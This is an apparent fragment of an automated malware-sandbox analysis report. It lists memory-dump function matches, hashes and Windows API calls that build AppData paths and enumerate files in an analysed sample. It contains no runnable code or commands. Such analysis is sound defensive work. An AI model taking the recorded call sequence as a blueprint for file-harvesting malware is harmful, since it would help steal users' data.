                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Similarity
                                      • API ID: Catch
                                      • String ID: MOC$RCC
                                      • API String ID: 78271584-2084237596
                                      • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                      • Instruction ID: f9badc0313689fa0ffeed56390faa0ec1e9c0054c6115a42dc3493e5258da317
                                      • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                      • Instruction Fuzzy Hash: 71414871900209EFDF16DF98DC81AAEBBB5BF48304F198199FA04A6251D335AA90DF51
                                      APIs
                                        • Part of subcall function 00128F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00128F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 001251CA
                                      • lstrcat.KERNEL32(?,00131058), ref: 001251E7
                                      • lstrcat.KERNEL32(?,00E39400), ref: 001251FB
                                      • lstrcat.KERNEL32(?,0013105C), ref: 0012520D
                                        • Part of subcall function 00124B60: wsprintfA.USER32 ref: 00124B7C
                                        • Part of subcall function 00124B60: FindFirstFileA.KERNEL32(?,?), ref: 00124B93
                                        • Part of subcall function 00124B60: StrCmpCA.SHLWAPI(?,00130FC4), ref: 00124BC1
                                        • Part of subcall function 00124B60: StrCmpCA.SHLWAPI(?,00130FC8), ref: 00124BD7
                                        • Part of subcall function 00124B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00124DCD
                                        • Part of subcall function 00124B60: FindClose.KERNEL32(000000FF), ref: 00124DE2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0
                                      • Opcode ID: abb2c7ba79b4122771c57d172d58e3e905a770096162075fbd4c849b3abf9e45
                                      • Instruction ID: c229e3164f6897abd90881b716f97bfb849493b67d9fbe5d7cc0e0d96af2b884
                                      • Opcode Fuzzy Hash: abb2c7ba79b4122771c57d172d58e3e905a770096162075fbd4c849b3abf9e45
                                      • Instruction Fuzzy Hash: 2C21FCB6904218ABCB65FBB0FC93EED733D9BA4300F404658B655971D1EF709AC88B91